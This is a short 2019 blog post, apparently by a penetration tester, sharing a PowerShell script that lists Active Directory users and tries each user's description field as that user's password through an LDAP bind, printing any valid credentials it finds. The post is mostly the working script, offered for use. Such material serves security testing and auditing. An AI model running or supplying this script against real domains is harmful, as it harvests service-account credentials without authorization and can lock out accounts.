Dumbest pentesting script to ever succeed

July 09, 2019

Scanning for passwords in description fields in AD

In today’s episode of “I can’t believe this is real”, the below Powershell script has a better than average likelyhood of handing out service account credentials.


$users = Get-ADuser -filter * -Properties description
$currentDomain = "LDAP://" + ([ADSI]"").distinguishedName

foreach ($user in $users) {
    if ($user.Description -ne $null) {
        $lookup = New-Object System.DirectoryServices.DirectoryEntry($currentDomain, $user.SamAccountName, $user.Description)
        if ($lookup.Name -ne $null) {
            write-host "We have a valid credential with $($user.SamAccountName) $($user.Description)"
        }
    }
}